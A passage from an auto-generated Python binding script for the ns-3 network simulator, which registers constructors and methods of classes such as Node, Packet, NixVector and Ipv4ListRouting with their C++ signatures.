'void',
[param('ns3::Address', 'address')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetIfIndex(uint32_t const index) [member function]
cls.add_method('SetIfIndex',
'void',
[param('uint32_t const', 'index')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SetMtu(uint16_t const mtu) [member function]
cls.add_method('SetMtu',
'bool',
[param('uint16_t const', 'mtu')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetNode(ns3::Ptr<ns3::Node> node) [member function]
cls.add_method('SetNode',
'void',
[param('ns3::Ptr< ns3::Node >', 'node')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetPromiscReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,const ns3::Address&,ns3::NetDevice::PacketType,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetPromiscReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): void ns3::NetDevice::SetReceiveCallback(ns3::Callback<bool,ns3::Ptr<ns3::NetDevice>,ns3::Ptr<const ns3::Packet>,short unsigned int,const ns3::Address&,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> cb) [member function]
cls.add_method('SetReceiveCallback',
'void',
[param('ns3::Callback< bool, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, short unsigned int, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'cb')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::SupportsSendFrom() const [member function]
cls.add_method('SupportsSendFrom',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
return
def register_Ns3NixVector_methods(root_module, cls):
cls.add_output_stream_operator()
## nix-vector.h (module 'network'): ns3::NixVector::NixVector() [constructor]
cls.add_constructor([])
## nix-vector.h (module 'network'): ns3::NixVector::NixVector(ns3::NixVector const & o) [copy constructor]
cls.add_constructor([param('ns3::NixVector const &', 'o')])
## nix-vector.h (module 'network'): void ns3::NixVector::AddNeighborIndex(uint32_t newBits, uint32_t numberOfBits) [member function]
cls.add_method('AddNeighborIndex',
'void',
[param('uint32_t', 'newBits'), param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::BitCount(uint32_t numberOfNeighbors) const [member function]
cls.add_method('BitCount',
'uint32_t',
[param('uint32_t', 'numberOfNeighbors')],
is_const=True)
## nix-vector.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::NixVector::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Deserialize(uint32_t const * buffer, uint32_t size) [member function]
cls.add_method('Deserialize',
'uint32_t',
[param('uint32_t const *', 'buffer'), param('uint32_t', 'size')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::ExtractNeighborIndex(uint32_t numberOfBits) [member function]
cls.add_method('ExtractNeighborIndex',
'uint32_t',
[param('uint32_t', 'numberOfBits')])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetRemainingBits() [member function]
cls.add_method('GetRemainingBits',
'uint32_t',
[])
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## nix-vector.h (module 'network'): uint32_t ns3::NixVector::Serialize(uint32_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint32_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
return
def register_Ns3Node_methods(root_module, cls):
## node.h (module 'network'): ns3::Node::Node(ns3::Node const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Node const &', 'arg0')])
## node.h (module 'network'): ns3::Node::Node() [constructor]
cls.add_constructor([])
## node.h (module 'network'): ns3::Node::Node(uint32_t systemId) [constructor]
cls.add_constructor([param('uint32_t', 'systemId')])
## node.h (module 'network'): uint32_t ns3::Node::AddApplication(ns3::Ptr<ns3::Application> application) [member function]
cls.add_method('AddApplication',
'uint32_t',
[param('ns3::Ptr< ns3::Application >', 'application')])
## node.h (module 'network'): uint32_t ns3::Node::AddDevice(ns3::Ptr<ns3::NetDevice> device) [member function]
cls.add_method('AddDevice',
'uint32_t',
[param('ns3::Ptr< ns3::NetDevice >', 'device')])
## node.h (module 'network'): static bool ns3::Node::ChecksumEnabled() [member function]
cls.add_method('ChecksumEnabled',
'bool',
[],
is_static=True)
## node.h (module 'network'): ns3::Ptr<ns3::Application> ns3::Node::GetApplication(uint32_t index) const [member function]
cls.add_method('GetApplication',
'ns3::Ptr< ns3::Application >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Node::GetDevice(uint32_t index) const [member function]
cls.add_method('GetDevice',
'ns3::Ptr< ns3::NetDevice >',
[param('uint32_t', 'index')],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetId() const [member function]
cls.add_method('GetId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNApplications() const [member function]
cls.add_method('GetNApplications',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetNDevices() const [member function]
cls.add_method('GetNDevices',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): uint32_t ns3::Node::GetSystemId() const [member function]
cls.add_method('GetSystemId',
'uint32_t',
[],
is_const=True)
## node.h (module 'network'): static ns3::TypeId ns3::Node::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## node.h (module 'network'): void ns3::Node::RegisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('RegisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::RegisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler, uint16_t protocolType, ns3::Ptr<ns3::NetDevice> device, bool promiscuous=false) [member function]
cls.add_method('RegisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler'), param('uint16_t', 'protocolType'), param('ns3::Ptr< ns3::NetDevice >', 'device'), param('bool', 'promiscuous', default_value='false')])
## node.h (module 'network'): void ns3::Node::UnregisterDeviceAdditionListener(ns3::Callback<void,ns3::Ptr<ns3::NetDevice>,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty,ns3::empty> listener) [member function]
cls.add_method('UnregisterDeviceAdditionListener',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'listener')])
## node.h (module 'network'): void ns3::Node::UnregisterProtocolHandler(ns3::Callback<void, ns3::Ptr<ns3::NetDevice>, ns3::Ptr<ns3::Packet const>, unsigned short, ns3::Address const&, ns3::Address const&, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty> handler) [member function]
cls.add_method('UnregisterProtocolHandler',
'void',
[param('ns3::Callback< void, ns3::Ptr< ns3::NetDevice >, ns3::Ptr< ns3::Packet const >, unsigned short, ns3::Address const &, ns3::Address const &, ns3::NetDevice::PacketType, ns3::empty, ns3::empty, ns3::empty >', 'handler')])
## node.h (module 'network'): void ns3::Node::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='protected', is_virtual=True)
## node.h (module 'network'): void ns3::Node::DoInitialize() [member function]
cls.add_method('DoInitialize',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3NormalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::INFINITE_VALUE [variable]
cls.add_static_attribute('INFINITE_VALUE', 'double const', is_const=True)
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::NormalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::NormalRandomVariable::NormalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetVariance() const [member function]
cls.add_method('GetVariance',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue(double mean, double variance, double bound=ns3::NormalRandomVariable::INFINITE_VALUE) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'variance'), param('double', 'bound', default_value='ns3::NormalRandomVariable::INFINITE_VALUE')])
## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger(uint32_t mean, uint32_t variance, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'variance'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::NormalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::NormalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3ObjectFactoryChecker_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryChecker::ObjectFactoryChecker(ns3::ObjectFactoryChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryChecker const &', 'arg0')])
return
def register_Ns3ObjectFactoryValue_methods(root_module, cls):
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue() [constructor]
cls.add_constructor([])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactoryValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectFactoryValue const &', 'arg0')])
## object-factory.h (module 'core'): ns3::ObjectFactoryValue::ObjectFactoryValue(ns3::ObjectFactory const & value) [constructor]
cls.add_constructor([param('ns3::ObjectFactory const &', 'value')])
## object-factory.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::ObjectFactoryValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): bool ns3::ObjectFactoryValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## object-factory.h (module 'core'): ns3::ObjectFactory ns3::ObjectFactoryValue::Get() const [member function]
cls.add_method('Get',
'ns3::ObjectFactory',
[],
is_const=True)
## object-factory.h (module 'core'): std::string ns3::ObjectFactoryValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## object-factory.h (module 'core'): void ns3::ObjectFactoryValue::Set(ns3::ObjectFactory const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::ObjectFactory const &', 'value')])
return
def register_Ns3OutputStreamWrapper_methods(root_module, cls):
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(ns3::OutputStreamWrapper const & arg0) [copy constructor]
cls.add_constructor([param('ns3::OutputStreamWrapper const &', 'arg0')])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::string filename, std::_Ios_Openmode filemode) [constructor]
cls.add_constructor([param('std::string', 'filename'), param('std::_Ios_Openmode', 'filemode')])
## output-stream-wrapper.h (module 'network'): ns3::OutputStreamWrapper::OutputStreamWrapper(std::ostream * os) [constructor]
cls.add_constructor([param('std::ostream *', 'os')])
## output-stream-wrapper.h (module 'network'): std::ostream * ns3::OutputStreamWrapper::GetStream() [member function]
cls.add_method('GetStream',
'std::ostream *',
[])
return
def register_Ns3Packet_methods(root_module, cls):
cls.add_output_stream_operator()
## packet.h (module 'network'): ns3::Packet::Packet() [constructor]
cls.add_constructor([])
## packet.h (module 'network'): ns3::Packet::Packet(ns3::Packet const & o) [copy constructor]
cls.add_constructor([param('ns3::Packet const &', 'o')])
## packet.h (module 'network'): ns3::Packet::Packet(uint32_t size) [constructor]
cls.add_constructor([param('uint32_t', 'size')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size, bool magic) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size'), param('bool', 'magic')])
## packet.h (module 'network'): ns3::Packet::Packet(uint8_t const * buffer, uint32_t size) [constructor]
cls.add_constructor([param('uint8_t const *', 'buffer'), param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddAtEnd(ns3::Ptr<ns3::Packet const> packet) [member function]
cls.add_method('AddAtEnd',
'void',
[param('ns3::Ptr< ns3::Packet const >', 'packet')])
## packet.h (module 'network'): void ns3::Packet::AddByteTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddByteTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddHeader(ns3::Header const & header) [member function]
cls.add_method('AddHeader',
'void',
[param('ns3::Header const &', 'header')])
## packet.h (module 'network'): void ns3::Packet::AddPacketTag(ns3::Tag const & tag) const [member function]
cls.add_method('AddPacketTag',
'void',
[param('ns3::Tag const &', 'tag')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::AddPaddingAtEnd(uint32_t size) [member function]
cls.add_method('AddPaddingAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::AddTrailer(ns3::Trailer const & trailer) [member function]
cls.add_method('AddTrailer',
'void',
[param('ns3::Trailer const &', 'trailer')])
## packet.h (module 'network'): ns3::PacketMetadata::ItemIterator ns3::Packet::BeginItem() const [member function]
cls.add_method('BeginItem',
'ns3::PacketMetadata::ItemIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::Packet >',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::CopyData(uint8_t * buffer, uint32_t size) const [member function]
cls.add_method('CopyData',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::CopyData(std::ostream * os, uint32_t size) const [member function]
cls.add_method('CopyData',
'void',
[param('std::ostream *', 'os'), param('uint32_t', 'size')],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Packet::CreateFragment(uint32_t start, uint32_t length) const [member function]
cls.add_method('CreateFragment',
'ns3::Ptr< ns3::Packet >',
[param('uint32_t', 'start'), param('uint32_t', 'length')],
is_const=True)
## packet.h (module 'network'): static void ns3::Packet::EnableChecking() [member function]
cls.add_method('EnableChecking',
'void',
[],
is_static=True)
## packet.h (module 'network'): static void ns3::Packet::EnablePrinting() [member function]
cls.add_method('EnablePrinting',
'void',
[],
is_static=True)
## packet.h (module 'network'): bool ns3::Packet::FindFirstMatchingByteTag(ns3::Tag & tag) const [member function]
cls.add_method('FindFirstMatchingByteTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): ns3::ByteTagIterator ns3::Packet::GetByteTagIterator() const [member function]
cls.add_method('GetByteTagIterator',
'ns3::ByteTagIterator',
[],
is_const=True)
## packet.h (module 'network'): ns3::Ptr<ns3::NixVector> ns3::Packet::GetNixVector() const [member function]
cls.add_method('GetNixVector',
'ns3::Ptr< ns3::NixVector >',
[],
is_const=True)
## packet.h (module 'network'): ns3::PacketTagIterator ns3::Packet::GetPacketTagIterator() const [member function]
cls.add_method('GetPacketTagIterator',
'ns3::PacketTagIterator',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSerializedSize() const [member function]
cls.add_method('GetSerializedSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::GetSize() const [member function]
cls.add_method('GetSize',
'uint32_t',
[],
is_const=True)
## packet.h (module 'network'): uint64_t ns3::Packet::GetUid() const [member function]
cls.add_method('GetUid',
'uint64_t',
[],
is_const=True)
## packet.h (module 'network'): uint8_t const * ns3::Packet::PeekData() const [member function]
cls.add_method('PeekData',
'uint8_t const *',
[],
deprecated=True, is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekHeader(ns3::Header & header) const [member function]
cls.add_method('PeekHeader',
'uint32_t',
[param('ns3::Header &', 'header')],
is_const=True)
## packet.h (module 'network'): bool ns3::Packet::PeekPacketTag(ns3::Tag & tag) const [member function]
cls.add_method('PeekPacketTag',
'bool',
[param('ns3::Tag &', 'tag')],
is_const=True)
## packet.h (module 'network'): uint32_t ns3::Packet::PeekTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('PeekTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): void ns3::Packet::Print(std::ostream & os) const [member function]
cls.add_method('Print',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintByteTags(std::ostream & os) const [member function]
cls.add_method('PrintByteTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::PrintPacketTags(std::ostream & os) const [member function]
cls.add_method('PrintPacketTags',
'void',
[param('std::ostream &', 'os')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::RemoveAllByteTags() [member function]
cls.add_method('RemoveAllByteTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAllPacketTags() [member function]
cls.add_method('RemoveAllPacketTags',
'void',
[])
## packet.h (module 'network'): void ns3::Packet::RemoveAtEnd(uint32_t size) [member function]
cls.add_method('RemoveAtEnd',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): void ns3::Packet::RemoveAtStart(uint32_t size) [member function]
cls.add_method('RemoveAtStart',
'void',
[param('uint32_t', 'size')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveHeader(ns3::Header & header) [member function]
cls.add_method('RemoveHeader',
'uint32_t',
[param('ns3::Header &', 'header')])
## packet.h (module 'network'): bool ns3::Packet::RemovePacketTag(ns3::Tag & tag) [member function]
cls.add_method('RemovePacketTag',
'bool',
[param('ns3::Tag &', 'tag')])
## packet.h (module 'network'): uint32_t ns3::Packet::RemoveTrailer(ns3::Trailer & trailer) [member function]
cls.add_method('RemoveTrailer',
'uint32_t',
[param('ns3::Trailer &', 'trailer')])
## packet.h (module 'network'): bool ns3::Packet::ReplacePacketTag(ns3::Tag & tag) [member function]
cls.add_method('ReplacePacketTag',
'bool',
[param('ns3::Tag &', 'tag')])
## packet.h (module 'network'): uint32_t ns3::Packet::Serialize(uint8_t * buffer, uint32_t maxSize) const [member function]
cls.add_method('Serialize',
'uint32_t',
[param('uint8_t *', 'buffer'), param('uint32_t', 'maxSize')],
is_const=True)
## packet.h (module 'network'): void ns3::Packet::SetNixVector(ns3::Ptr<ns3::NixVector> arg0) [member function]
cls.add_method('SetNixVector',
'void',
[param('ns3::Ptr< ns3::NixVector >', 'arg0')])
return
def register_Ns3ParetoRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ParetoRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ParetoRandomVariable::ParetoRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetShape() const [member function]
cls.add_method('GetShape',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue(double mean, double shape, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'shape'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger(uint32_t mean, uint32_t shape, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'shape'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::ParetoRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ParetoRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3TimeValue_methods(root_module, cls):
## nstime.h (module 'core'): ns3::TimeValue::TimeValue() [constructor]
cls.add_constructor([])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::TimeValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TimeValue const &', 'arg0')])
## nstime.h (module 'core'): ns3::TimeValue::TimeValue(ns3::Time const & value) [constructor]
cls.add_constructor([param('ns3::Time const &', 'value')])
## nstime.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TimeValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): bool ns3::TimeValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## nstime.h (module 'core'): ns3::Time ns3::TimeValue::Get() const [member function]
cls.add_method('Get',
'ns3::Time',
[],
is_const=True)
## nstime.h (module 'core'): std::string ns3::TimeValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## nstime.h (module 'core'): void ns3::TimeValue::Set(ns3::Time const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Time const &', 'value')])
return
def register_Ns3TypeIdChecker_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdChecker::TypeIdChecker(ns3::TypeIdChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdChecker const &', 'arg0')])
return
def register_Ns3TypeIdValue_methods(root_module, cls):
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue() [constructor]
cls.add_constructor([])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeIdValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::TypeIdValue const &', 'arg0')])
## type-id.h (module 'core'): ns3::TypeIdValue::TypeIdValue(ns3::TypeId const & value) [constructor]
cls.add_constructor([param('ns3::TypeId const &', 'value')])
## type-id.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::TypeIdValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): bool ns3::TypeIdValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## type-id.h (module 'core'): ns3::TypeId ns3::TypeIdValue::Get() const [member function]
cls.add_method('Get',
'ns3::TypeId',
[],
is_const=True)
## type-id.h (module 'core'): std::string ns3::TypeIdValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## type-id.h (module 'core'): void ns3::TypeIdValue::Set(ns3::TypeId const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::TypeId const &', 'value')])
return
def register_Ns3AddressChecker_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressChecker::AddressChecker() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressChecker::AddressChecker(ns3::AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressChecker const &', 'arg0')])
return
def register_Ns3AddressValue_methods(root_module, cls):
## address.h (module 'network'): ns3::AddressValue::AddressValue() [constructor]
cls.add_constructor([])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::AddressValue const &', 'arg0')])
## address.h (module 'network'): ns3::AddressValue::AddressValue(ns3::Address const & value) [constructor]
cls.add_constructor([param('ns3::Address const &', 'value')])
## address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## address.h (module 'network'): bool ns3::AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## address.h (module 'network'): ns3::Address ns3::AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Address',
[],
is_const=True)
## address.h (module 'network'): std::string ns3::AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## address.h (module 'network'): void ns3::AddressValue::Set(ns3::Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Address const &', 'value')])
return
def register_Ns3Ipv4ListRouting_methods(root_module, cls):
## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting::Ipv4ListRouting(ns3::Ipv4ListRouting const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4ListRouting const &', 'arg0')])
## ipv4-list-routing.h (module 'internet'): ns3::Ipv4ListRouting::Ipv4ListRouting() [constructor]
cls.add_constructor([])
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::AddRoutingProtocol(ns3::Ptr<ns3::Ipv4RoutingProtocol> routingProtocol, int16_t priority) [member function]
cls.add_method('AddRoutingProtocol',
'void',
[param('ns3::Ptr< ns3::Ipv4RoutingProtocol >', 'routingProtocol'), param('int16_t', 'priority')],
is_virtual=True)
## ipv4-list-routing.h (module 'internet'): uint32_t ns3::Ipv4ListRouting::GetNRoutingProtocols() const [member function]
cls.add_method('GetNRoutingProtocols',
'uint32_t',
[],
is_const=True, is_virtual=True)
## ipv4-list-routing.h (module 'internet'): ns3::Ptr<ns3::Ipv4RoutingProtocol> ns3::Ipv4ListRouting::GetRoutingProtocol(uint32_t index, int16_t & priority) const [member function]
cls.add_method('GetRoutingProtocol',
'ns3::Ptr< ns3::Ipv4RoutingProtocol >',
[param('uint32_t', 'index'), param('int16_t &', 'priority', direction=2)],
is_const=True, is_virtual=True)
## ipv4-list-routing.h (module 'internet'): static ns3::TypeId ns3::Ipv4ListRouting::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyAddAddress(uint32_t interface, ns3::Ipv4InterfaceAddress address) [member function]
cls.add_method('NotifyAddAddress',
'void',
[param('uint32_t', 'interface'), param('ns3::Ipv4InterfaceAddress', 'address')],
is_virtual=True)
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyInterfaceDown(uint32_t interface) [member function]
cls.add_method('NotifyInterfaceDown',
'void',
[param('uint32_t', 'interface')],
is_virtual=True)
## ipv4-list-routing.h (module 'internet'): void ns3::Ipv4ListRouting::NotifyInterfaceUp(uint32_t interface) [member function]
cls.add_method('NotifyInterfaceUp',
'void',
